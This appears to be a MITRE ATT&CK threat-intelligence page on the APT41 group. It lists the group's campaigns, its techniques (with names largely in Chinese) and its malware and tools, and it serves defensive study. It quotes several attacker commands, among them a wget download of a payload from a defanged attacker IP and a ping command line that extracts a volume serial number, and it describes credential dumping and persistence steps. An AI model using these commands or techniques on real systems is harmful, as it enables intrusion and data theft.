1. Home
  2. Groups
  3. APT41

APT41

APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.[1] Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[2][3]

ID: G0096
Associated Groups: Wicked Panda, Brass Typhoon, BARIUM
Contributors: Kyaw Pyiyt Htet, @KyawPyiytHtet; Nikita Rostovcev, Group-IB
Version: 4.1
Created: 23 September 2019
Last Modified: 22 April 2025

Associated Group Descriptions

Name Description
Wicked Panda

[4]
Brass Typhoon

[5]
BARIUM

[5]

Campaigns

ID Name First Seen Last Seen References Techniques
C0040 APT41 DUST January 2023 [6] June 2024 [6]

APT41 DUST was conducted by APT41 from 2023 to July 2024.[6]

 从信息存储库获取数据, 伪装: Masquerade Task or Service, 创建或修改系统进程: Windows Service, 加密通道: Asymmetric Cryptography, 劫持执行流: DLL Search Order Hijacking, 劫持执行流: DLL Side-Loading, 应用层协议: Web Protocols, 归档收集数据: Archive via Utility, 搜索受害者拥有的网站, 搜索开放技术数据库: Scan Databases, 搜索开放网站/域: Search Engines, 数据分段: Local Data Staging, 服务器软件组件: Web Shell, 混淆文件或信息: Encrypted/Encoded File, 移除指标: File Deletion, 系统服务: Service Execution, 网络服务, 自动化收集, 获取基础设施: Serverless, 获取能力: Code Signing Certificates, 账号妥协: Cloud Accounts, 输入工具传输, 通过网络服务渗出: Exfiltration to Cloud Storage, 颠覆信任控制: Code Signing
C0017 C0017 May 2021 [7] February 2022 [7]

[7]

 从本地系统获取数据, 代理, 伪装: Masquerade Task or Service, 伪装: Match Legitimate Name or Location, 利用公开应用程序漏洞, 劫持执行流, 反混淆/解码文件或信息, 命令与脚本解释器: JavaScript, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 归档收集数据: Archive via Custom Method, 操作系统凭证转储: Security Account Manager, 数据分段: Local Data Staging, 数据混淆: Protocol or Service Impersonation, 替代协议渗出: Exfiltration Over Unencrypted Non-C2 Protocol, 服务器软件组件: Web Shell, 混淆文件或信息: Software Packing, 混淆文件或信息, 系统信息发现, 系统所有者/用户发现, 系统网络配置发现, 网络服务: Dead Drop Resolver, 网络服务, 获取能力: Tool, 访问令牌操控, 输入工具传输, 通过C2信道渗出, 通过网络服务渗出, 预定任务/作业: Scheduled Task
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1197 BITS任务

APT41 used BITSAdmin to download and install payloads.[8][4]
Enterprise T1014 Rootkit

APT41 deployed rootkits on Linux systems.[2][4]
Enterprise T1047 Windows管理规范

APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.[2][3] APT41 has executed files through Windows Management Instrumentation (WMI).[9]
Enterprise T1595 .002 主动扫描: Vulnerability Scanning

APT41 used the Acunetix SQL injection vulnerability scanner in target reconnaissance operations, as well as the JexBoss tool to identify vulnerabilities in Java applications.[10]
.003 主动扫描: Wordlist Scanning

APT41 leverages various tools and frameworks to brute-force directories on web servers.[10]
Enterprise T1546 .008 事件触发执行: Accessibility Features

APT41 leveraged sticky keys to establish persistence.[2]

Enterprise T1213 .003 从信息存储库获取数据: Code Repositories

APT41 cloned victim user Git repositories during intrusions.[10]
Enterprise T1555 从密码存储中获取凭证

APT41 has obtained information about accounts, lists of employees, and plaintext and hashed passwords from databases.[10]
.003 Credentials from Web Browsers

APT41 used BrowserGhost, a tool designed to obtain credentials from browsers, to retrieve information from password stores.[10]
Enterprise T1005 从本地系统获取数据

APT41 has uploaded files and data from a compromised host.[3]

During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.[7]

Enterprise T1090 代理

APT41 used a tool called CLASSFON to covertly proxy network communications.[2]

During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[7]
Enterprise T1036 .004 伪装: Masquerade Task or Service

APT41 has created services to appear as benign system tools.[3]

APT41 DUST disguised DUSTPAN as a legitimate Windows binary such as w3wp.exe or conn.exe.[6]

During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code.[7]
.005 伪装: Match Legitimate Name or Location

APT41 attempted to masquerade their files as popular anti-virus software.[2][3]

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.[7]
Enterprise T1656 伪装

APT41 impersonated an employee at a video game developer company to send phishing emails.[1]
Enterprise T1550 .002 使用备用认证材料: Pass the Hash

APT41 uses tools such as Mimikatz to enable lateral movement via captured password hashes.[10]
Enterprise T1195 .002 供应链破坏: Compromise Software Supply Chain

APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.[2]
Enterprise T1112 修改注册表

APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.[2][3]
Enterprise T1543 .003 创建或修改系统进程: Windows Service

APT41 modified legitimate Windows services to install malware backdoors.[2][3] APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.[8]

APT41 DUST used Windows Services with names such as Windows Defend for persistence of DUSTPAN.[6]
Enterprise T1136 .001 创建账户: Local Account

APT41 has created user accounts.[2]

Enterprise T1190 利用公开应用程序漏洞

APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central through unsafe deserialization, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.[8] APT41 leveraged vulnerabilities such as ProxyLogon exploitation or SQL injection for initial access.[10] APT41 exploited CVE-2021-26855 against a vulnerable Microsoft Exchange Server to gain initial access to the victim network.[9]

During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.[7]
Enterprise T1573 .002 加密通道: Asymmetric Cryptography

APT41 DUST used HTTPS for command and control.[6]
Enterprise T1568 .002 动态解析: Domain Generation Algorithms

APT41 has used DGAs to change their C2 servers monthly.[2]
Enterprise T1574 .001 劫持执行流: DLL Search Order Hijacking

APT41 has used search order hijacking to execute malicious payloads, such as Winnti for Windows.[4]

APT41 DUST involved the use of DLL search order hijacking to execute DUSTTRAP.[6]
.002 劫持执行流: DLL Side-Loading

APT41 used legitimate executables to perform DLL side-loading of their malware.[2]

APT41 DUST used DLL side-loading to execute DUSTTRAP via an AhnLab uninstaller.[6]
.006 劫持执行流: Dynamic Linker Hijacking

APT41 has configured payloads to load via LD_PRELOAD.[4]

Enterprise T1140 反混淆/解码文件或信息

During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[7]
Enterprise T1037 启动或登录初始化脚本

APT41 used a hidden shell script in /etc/rc.d/init.d to leverage the ADORE.XSECbackdoor and Adore-NG rootkit.[1]
Enterprise T1547 .001 启动或登录自动启动执行: Registry Run Keys / Startup Folder

APT41 created and modified startup files for persistence.[2][3] APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.[8]
Enterprise T1059 .001 命令与脚本解释器: PowerShell

APT41 leveraged PowerShell to deploy malware families in victims’ environments.[2][8]
.003 命令与脚本解释器: Windows Command Shell

APT41 used cmd.exe /c to execute commands on remote machines.[2]APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.[8]

During C0017, APT41 used cmd.exe to execute reconnaissance commands.[7]
.004 命令与脚本解释器: Unix Shell

APT41 used Linux shell commands for system survey and information gathering prior to exploitation of vulnerabilities such as CVE-2019-19871.[8]
.007 命令与脚本解释器: JavaScript

During C0017, APT41 deployed JScript web shells on compromised systems.[7]
Enterprise T1008 回退信道

APT41 used the Steam community page as a fallback mechanism for C2.[2]

Enterprise T1484 .001 域或租户策略修改: Group Policy Modification

APT41 used scheduled tasks created via Group Policy Objects (GPOs) to deploy ransomware.[1]
Enterprise T1133 外部远程服务

APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.[2]
Enterprise T1104 多阶段信道

APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.[8]
Enterprise T1562 .006 妨碍防御: Indicator Blocking

APT41 developed a custom injector that enables an Event Tracing for Windows (ETW) bypass, making malicious processes invisible to Windows logging.[10]
Enterprise T1203 客户端执行漏洞利用

APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[2]

Enterprise T1071 .001 应用层协议: Web Protocols

APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[8]

APT41 DUST used HTTPS for command and control.[6]

During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.[7]
.002 应用层协议: File Transfer Protocols

APT41 used exploit payloads that initiate download via ftp.[8]
.004 应用层协议: DNS

APT41 used DNS for C2 communications.[2][3]

Enterprise T1560 .001 归档收集数据: Archive via Utility

APT41 created a RAR archive of targeted files for exfiltration.[2] Additionally, APT41 used the makecab.exe utility to both download tools, such as NATBypass, to the victim network and to archive a file for exfiltration.[9]

APT41 DUST used rar to compress data downloaded from internal Oracle databases prior to exfiltration.[6]
.003 归档收集数据: Archive via Custom Method

During C0017, APT41 hex-encoded PII data prior to exfiltration.[7]
Enterprise T1480 .001 执行保护: Environmental Keying

APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.[11]
Enterprise T1594 搜索受害者拥有的网站

APT41 DUST involved access of external victim websites for target development.[6]
Enterprise T1596 .005 搜索开放技术数据库: Scan Databases

APT41 uses the Chinese website fofa.su, similar to the Shodan scanning service, for passive scanning of victims.[10]

APT41 DUST used internet scan data for target development.[6]
Enterprise T1593 .002 搜索开放网站/域: Search Engines

APT41 DUST involved use of search engines to research victim servers.[6]
Enterprise T1003 .001 操作系统凭证转储: LSASS Memory

APT41 has used hashdump, Mimikatz, Procdump, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.[2][3][9]
.002 操作系统凭证转储: Security Account Manager

APT41 extracted user account data from the Security Account Managerr (SAM), making a copy of this database from the registry using the reg save command or by exploiting volume shadow copies.[10]

During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting.[7]
.003 操作系统凭证转储: NTDS

APT41 used ntdsutil to obtain a copy of the victim environment ntds.dit file.[10]
Enterprise T1030 数据传输大小限制

APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection.[10]
Enterprise T1074 .001 数据分段: Local Data Staging

APT41 DUST involved exporting data from Oracle databases to local CSV files prior to exfiltration.[6]

During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory.[7]
Enterprise T1486 数据加密以实现影响

APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.[2] APT41 also used Microsoft Bitlocker to encrypt workstations and Jetico’s BestCrypt to encrypt servers.[9]
Enterprise T1001 .003 数据混淆: Protocol or Service Impersonation

During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[7]
Enterprise T1083 文件和目录发现

APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.[8]
Enterprise T1110 暴力破解

APT41 performed password brute-force attacks on the local admin account.[2]
Enterprise T1048 .003 替代协议渗出: Exfiltration Over Unencrypted Non-C2 Protocol

During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.[7]
Enterprise T1078 有效账户

APT41 used compromised credentials to log on to other systems.[2][4]
Enterprise T1505 .003 服务器软件组件: Web Shell

APT41 DUST involved use of web shells such as ANTSWORD and BLUEBEAM for persistence.[6]

During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[7]
Enterprise T1069 权限组发现

APT41 used net group commands to enumerate various Windows user groups and permissions.[10]
Enterprise T1012 查询注册表

APT41 queried registry values to determine items such as configured RDP ports and network configurations.[10]
Enterprise T1570 横向工具传输

APT41 uses remote shares to move and remotely execute payloads during lateral movemement.[10]
Enterprise T1027 混淆文件或信息

APT41 used VMProtected binaries in multiple intrusions.[8]

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[7]
.002 Software Packing

APT41 uses packers such as Themida to obfuscate malicious files.[10]

During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[7]
.013 Encrypted/Encoded File

APT41 DUST used encrypted payloads decrypted and executed in memory.[6]
Enterprise T1070 .001 移除指标: Clear Windows Event Logs

APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.[2]
.003 移除指标: Clear Command History

APT41 attempted to remove evidence of some of its activity by deleting Bash histories.[2]
.004 移除指标: File Deletion

APT41 deleted files from the system.[2][10]

APT41 DUST deleted various artifacts from victim systems following use.[6]
Enterprise T1218 .001 系统二进制代理执行: Compiled HTML File

APT41 used compiled HTML (.chm) files for targeting.[2]

.011 系统二进制代理执行: Rundll32

APT41 has used rundll32.exe to execute a loader.[4]
Enterprise T1082 系统信息发现

APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information.[10]

During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems.[7]
Enterprise T1033 系统所有者/用户发现

APT41 has executed whoami commands, including using the WMIEXEC utility to execute this on remote machines.[2][10]

During C0017, APT41 used whoami to gather information from victim machines.[7]
Enterprise T1569 .002 系统服务: Service Execution

APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.[8][3]

APT41 DUST used Windows services to execute DUSTPAN.[6]
Enterprise T1049 系统网络连接发现

APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.[2][3]
Enterprise T1016 系统网络配置发现

APT41 collected MAC addresses from victim machines.[2][3]

During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.[7]
Enterprise T1135 网络共享发现

APT41 used the net share command as part of network reconnaissance.[2][3]
Enterprise T1102 .001 网络服务: Dead Drop Resolver

APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.[2]

During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[7]
Enterprise T1046 网络服务发现

APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.[2]
Enterprise T1599 网络边界桥接

APT41 used NATBypass to bypass firewall restrictions and to access compromised systems via RDP.[9]
Enterprise T1119 自动化收集

APT41 DUST used tools such as SQLULDR2 and PINEGROVE to gather local system and database information.[6]
Enterprise T1583 .007 获取基础设施: Serverless

APT41 DUST used infrastructure hosted behind Cloudflare or utilized Cloudflare Workers for command and control.[6]
Enterprise T1588 .002 获取能力: Tool

APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.[2]

For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[7]
.003 获取能力: Code Signing Certificates

APT41 DUST used stolen code signing certificates to sign DUSTTRAP malware and components.[6]
Enterprise T1134 访问令牌操控

During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.[7]
Enterprise T1087 .001 账号发现: Local Account

APT41 used built-in net commands to enumerate local administrator groups.[10]
.002 账号发现: Domain Account

APT41 used built-in net commands to enumerate domain administrator users.[10]
Enterprise T1586 .003 账号妥协: Cloud Accounts

APT41 DUST used compromised Google Workspace accounts for command and control.[6]
Enterprise T1098 .007 账号操控: Additional Local or Domain Groups

APT41 has added user accounts to the User and Admin groups.[2]

Enterprise T1496 .001 资源劫持: Compute Hijacking

APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.[2][1]
Enterprise T1105 输入工具传输

APT41 used certutil to download additional files.[8][4][3] APT41 downloaded post-exploitation tools such as Cobalt Strike via command shell following initial access.[10] APT41 has uploaded Procdump and NATBypass to a staging directory and has used these tools in follow-on activities.[9]

APT41 DUST involved execution of certutil.exe via web shell to download the DUSTPAN dropper.[6]

During C0017, APT41 downloaded malicious payloads onto compromised systems.[7]
Enterprise T1056 .001 输入捕获: Keylogging

APT41 used a keylogger called GEARSHIFT on a target system.[2]
Enterprise T1055 进程注入

APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.[2]
Enterprise T1021 .001 远程服务: Remote Desktop Protocol

APT41 used RDP for lateral movement.[2][4] APT41 used NATBypass to expose local RDP ports on compromised systems to the Internet.[9]

.002 远程服务: SMB/Windows Admin Shares

APT41 has transferred implant files using Windows Admin Shares and the Server Message Block (SMB) protocol, then executes files through Windows Management Instrumentation (WMI).[4][9]
Enterprise T1018 远程系统发现

APT41 has used MiPing to discover active systems in the victim network.[9]

Enterprise T1041 通过C2信道渗出

During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.[7]
Enterprise T1567 .002 通过网络服务渗出: Exfiltration to Cloud Storage

APT41 DUST exfiltrated collected information to OneDrive.[6]
Enterprise T1566 .001 钓鱼: Spearphishing Attachment

APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.[2]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

APT41 used a compromised account to create a scheduled task on a system.[2][4]

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared.[7]

Enterprise T1542 .003 预操作系统引导: Bootkit

APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.[2]
Enterprise T1553 .002 颠覆信任控制: Code Signing

APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.[2][3]

APT41 DUST used stolen code signing certificates for DUSTTRAP malware and subsequent payloads.[6]

Software

ID Name References Techniques
S0073 ASPXSpy [2] 服务器软件组件: Web Shell
S0190 BITSAdmin [8] BITS任务, 替代协议渗出: Exfiltration Over Unencrypted Non-C2 Protocol, 横向工具传输, 输入工具传输
S0069 BLACKCOFFEE [2] 命令与脚本解释器: Windows Command Shell, 多阶段信道, 文件和目录发现, 移除指标: File Deletion, 网络服务: Dead Drop Resolver, 网络服务: Bidirectional Communication, 进程发现
S0160 certutil [8] 反混淆/解码文件或信息, 归档收集数据: Archive via Utility, 输入工具传输, 颠覆信任控制: Install Root Certificate
S0020 China Chopper APT41 used the China Chopper web shell as a persistence mechanism on compromised Microsoft Exchange servers.[9][2] 从本地系统获取数据, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 文件和目录发现, 暴力破解: Password Guessing, 服务器软件组件: Web Shell, 混淆文件或信息: Software Packing, 移除指标: Timestomp, 网络服务发现, 输入工具传输
S0154 Cobalt Strike [8][3] BITS任务, Windows管理规范, 从本地系统获取数据, 代理: Domain Fronting, 代理: Internal Proxy, 使用备用认证材料: Pass the Hash, 修改注册表, 创建或修改系统进程: Windows Service, 办公应用启动: Office Template Macros, 加密通道: Asymmetric Cryptography, 加密通道: Symmetric Cryptography, 协议隧道, 反射性代码加载, 反混淆/解码文件或信息, 命令与脚本解释器: JavaScript, 命令与脚本解释器: Visual Basic, 命令与脚本解释器: PowerShell, 命令与脚本解释器: Python, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify Tools, 客户端执行漏洞利用, 屏幕捕获, 应用层协议: DNS, 应用层协议: Web Protocols, 应用层协议: File Transfer Protocols, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: Security Account Manager, 数据传输大小限制, 数据混淆: Protocol or Service Impersonation, 数据编码: Standard Encoding, 文件和目录发现, 有效账户: Domain Accounts, 有效账户: Local Accounts, 本机API, 权限提升漏洞利用, 权限组发现: Domain Groups, 权限组发现: Local Groups, 查询注册表, 浏览器会话劫持, 混淆文件或信息: Indicator Removal from Tools, 混淆文件或信息, 滥用权限提升控制机制: Sudo and Sudo Caching, 滥用权限提升控制机制: Bypass User Account Control, 移除指标: Timestomp, 系统二进制代理执行: Rundll32, 系统服务: Service Execution, 系统服务发现, 系统网络连接发现, 系统网络配置发现, 网络共享发现, 网络服务发现, 访问令牌操控: Parent PID Spoofing, 访问令牌操控: Token Impersonation/Theft, 访问令牌操控: Make and Impersonate Token, 账号发现: Domain Account, 软件发现, 输入工具传输, 输入捕获: Keylogging, 进程发现, 进程注入: Dynamic-link Library Injection, 进程注入: Process Hollowing, 进程注入, 远程服务: Remote Desktop Protocol, 远程服务: SSH, 远程服务: Windows Remote Management, 远程服务: SMB/Windows Admin Shares, 远程服务: Distributed Component Object Model, 远程系统发现, 隐藏伪装: Process Argument Spoofing, 非应用层协议, 预定传输, 颠覆信任控制: Code Signing
S1052 DEADEYE [7] 伪装: Masquerade Task or Service, 反混淆/解码文件或信息, 命令与脚本解释器: Windows Command Shell, 执行保护, 本机API, 混淆文件或信息: Encrypted/Encoded File, 混淆文件或信息: Embedded Payloads, 系统二进制代理执行: Msiexec, 系统二进制代理执行: Rundll32, 系统信息发现, 系统网络配置发现, 隐藏伪装: NTFS File Attributes, 预定任务/作业
S0021 Derusbi [2] 加密通道: Symmetric Cryptography, 命令与脚本解释器: Unix Shell, 回退信道, 屏幕捕获, 文件和目录发现, 查询注册表, 移除指标: Timestomp, 移除指标: File Deletion, 系统二进制代理执行: Regsvr32, 系统信息发现, 系统所有者/用户发现, 视频捕获, 输入捕获: Keylogging, 进程发现, 进程注入: Dynamic-link Library Injection, 非应用层协议, 非标准端口, 音频捕获
S0105 dsquery [7] 域信任发现, 权限组发现: Domain Groups, 系统信息发现, 账号发现: Domain Account
S1158 DUSTPAN DUSTPAN has been used by APT41 in various campaigns since at least 2021.[12][6] 伪装: Match Legitimate Name or Location, 创建或修改系统进程: Windows Service, 反混淆/解码文件或信息, 混淆文件或信息: Encrypted/Encoded File, 混淆文件或信息: Embedded Payloads, 进程注入: Portable Executable Injection
S1159 DUSTTRAP DUSTTRAP is used by APT41.[6] 从本地系统获取数据, 反混淆/解码文件或信息, 命令与脚本解释器: Windows Command Shell, 域信任发现, 屏幕捕获, 应用窗口发现, 文件和目录发现, 日志枚举, 查询注册表, 混淆文件或信息: Encrypted/Encoded File, 混淆文件或信息: Embedded Payloads, 移除指标, 移除指标: Clear Windows Event Logs, 移除指标: Network Share Connection Removal, 系统信息发现, 系统时间发现, 系统网络配置发现, 组策略发现, 网络共享发现, 虚拟化/沙盒规避: System Checks, 账号发现: Domain Account, 账号发现: Local Account, 软件发现: Security Software Discovery, 输入工具传输, 输入捕获: Keylogging, 进程发现, 进程注入, 远程系统发现, 通过C2信道渗出
S0363 Empire [4] Windows管理规范, 中间人攻击: LLMNR/NBT-NS Poisoning and SMB Relay, 事件触发执行: Accessibility Features, 从密码存储中获取凭证: Credentials from Web Browsers, 使用备用认证材料: Pass the Hash, 创建或修改系统进程: Windows Service, 创建账户: Local Account, 创建账户: Domain Account, 剪贴板数据, 加密通道: Asymmetric Cryptography, 劫持执行流: Path Interception by Unquoted Path, 劫持执行流: Path Interception by Search Order Hijacking, 劫持执行流: Path Interception by PATH Environment Variable, 劫持执行流: Dylib Hijacking, 劫持执行流: DLL Search Order Hijacking, 可信开发者工具代理执行: MSBuild, 启动或登录自动启动执行: Security Support Provider, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 启动或登录自动启动执行: Shortcut Modification, 命令与脚本解释器: PowerShell, 命令与脚本解释器: Windows Command Shell, 命令与脚本解释器, 域信任发现, 域或租户策略修改: Group Policy Modification, 屏幕捕获, 应用层协议: Web Protocols, 归档收集数据, 操作系统凭证转储: LSASS Memory, 文件和目录发现, 未加密凭证: Credentials In Files, 未加密凭证: Private Keys, 本机API, 权限提升漏洞利用, 浏览器信息发现, 混淆文件或信息: Command Obfuscation, 滥用权限提升控制机制: Bypass User Account Control, 电子邮件收集: Local Email Collection, 移除指标: Timestomp, 窃取或伪造Kerberos票据: Kerberoasting, 窃取或伪造Kerberos票据: Golden Ticket, 窃取或伪造Kerberos票据: Silver Ticket, 系统信息发现, 系统所有者/用户发现, 系统服务: Service Execution, 系统网络连接发现, 系统网络配置发现, 组策略发现, 网络共享发现, 网络嗅探, 网络服务: Bidirectional Communication, 网络服务发现, 自动化收集, 自动化渗出, 视频捕获, 访问令牌操控: SID-History Injection, 访问令牌操控, 访问令牌操控: Create Process with Token, 账号发现: Domain Account, 账号发现: Local Account, 软件发现: Security Software Discovery, 输入工具传输, 输入捕获: Keylogging, 输入捕获: Credential API Hooking, 进程发现, 进程注入, 远程服务: Distributed Component Object Model, 远程服务: SSH, 远程服务漏洞利用, 通过C2信道渗出, 通过网络服务渗出: Exfiltration to Code Repository, 通过网络服务渗出: Exfiltration to Cloud Storage, 预定任务/作业: Scheduled Task
S0095 ftp [8] 替代协议渗出: Exfiltration Over Unencrypted Non-C2 Protocol, 横向工具传输, 输入工具传输
S0032 gh0st RAT [2] 修改注册表, 共享模块, 创建或修改系统进程: Windows Service, 加密通道: Symmetric Cryptography, 加密通道, 动态解析: Fast Flux DNS, 劫持执行流: DLL Side-Loading, 反混淆/解码文件或信息, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器, 屏幕捕获, 数据编码: Standard Encoding, 本机API, 查询注册表, 移除指标: Clear Windows Event Logs, 移除指标: File Deletion, 系统二进制代理执行: Rundll32, 系统信息发现, 系统服务: Service Execution, 输入工具传输, 输入捕获: Keylogging, 进程发现, 进程注入, 非应用层协议
S0357 Impacket APT41 used Impacket to dump LSA secrets on one of the domain controllers in the victim network.[9] Windows管理规范, 中间人攻击: LLMNR/NBT-NS Poisoning and SMB Relay, 操作系统凭证转储: NTDS, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: LSA Secrets, 窃取或伪造Kerberos票据: Kerberoasting, 窃取或伪造Kerberos票据: Ccache Files, 系统服务: Service Execution, 网络嗅探
S0100 ipconfig [3] 系统网络配置发现
S1051 KEYPLUG [7] 代理, 加密通道: Asymmetric Cryptography, 反混淆/解码文件或信息, 应用层协议: Web Protocols, 混淆文件或信息: Encrypted/Encoded File, 系统时间发现, 网络服务: Dead Drop Resolver, 非应用层协议
S1185 LightSpy [13] Application Layer Protocol: Web Protocols, Archive Collected Data, Audio Capture, Boot or Logon Initialization Scripts, Command and Scripting Interpreter, Credentials from Password Store: Keychain, Data Destruction, Data from Local System, Drive-By Compromise, Endpoint Denial of Service, Exfiltration Over C2 Channel, Exploitation for Client Execution, Exploitation for Privilege Escalation, Ingress Tool Transfer, Location Tracking, Masquerading, Native API, Network Service Scanning, Non-Standard Port, Obfuscated Files or Information, Phishing, Process Discovery, Process Injection, Protected User Data: Contact List, Protected User Data: Call Log, Protected User Data: SMS Messages, Screen Capture, SMS Control, Software Discovery, Stored Application Data, System Information Discovery, System Network Configuration Discovery: Wi-Fi Discovery, System Network Configuration Discovery, System Network Connections Discovery, Video Capture
S0443 MESSAGETAP [14][4] 反混淆/解码文件或信息, 归档收集数据: Archive via Custom Method, 数据分段: Local Data Staging, 文件和目录发现, 移除指标: File Deletion, 系统网络连接发现, 网络嗅探, 自动化收集
S0002 Mimikatz [2][3] 从密码存储中获取凭证, 从密码存储中获取凭证: Credentials from Web Browsers, 从密码存储中获取凭证: Windows Credential Manager, 伪造域控制器, 使用备用认证材料: Pass the Hash, 使用备用认证材料: Pass the Ticket, 启动或登录自动启动执行: Security Support Provider, 操作系统凭证转储: DCSync, 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: LSA Secrets, 未加密凭证: Private Keys, 窃取或伪造Kerberos票据: Golden Ticket, 窃取或伪造Kerberos票据: Silver Ticket, 窃取或伪造身份认证证书, 访问令牌操控: SID-History Injection, 账号操控
S0039 Net [2] 创建账户: Local Account, 创建账户: Domain Account, 密码策略发现, 权限组发现: Domain Groups, 权限组发现: Local Groups, 移除指标: Network Share Connection Removal, 系统时间发现, 系统服务: Service Execution, 系统服务发现, 系统网络连接发现, 网络共享发现, 账号发现: Domain Account, 账号发现: Local Account, 账号操控: Additional Local or Domain Groups, 远程服务: SMB/Windows Admin Shares, 远程系统发现
S0104 netstat [2] 系统网络连接发现
S0385 njRAT [2] 从密码存储中获取凭证: Credentials from Web Browsers, 从本地系统获取数据, 修改注册表, 动态解析: Fast Flux DNS, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: PowerShell, 命令与脚本解释器: Windows Command Shell, 外围设备发现, 妨碍防御: Disable or Modify System Firewall, 屏幕捕获, 应用层协议: Web Protocols, 应用窗口发现, 数据编码: Standard Encoding, 文件和目录发现, 本机API, 查询注册表, 混淆文件或信息: Encrypted/Encoded File, 混淆文件或信息: Compile After Delivery, 移除指标: File Deletion, 移除指标: Clear Persistence, 系统信息发现, 系统所有者/用户发现, 视频捕获, 输入工具传输, 输入捕获: Keylogging, 进程发现, 远程服务: Remote Desktop Protocol, 远程系统发现, 通过C2信道渗出, 通过可移动媒体复制, 非标准端口
S0097 Ping [2][3] 远程系统发现
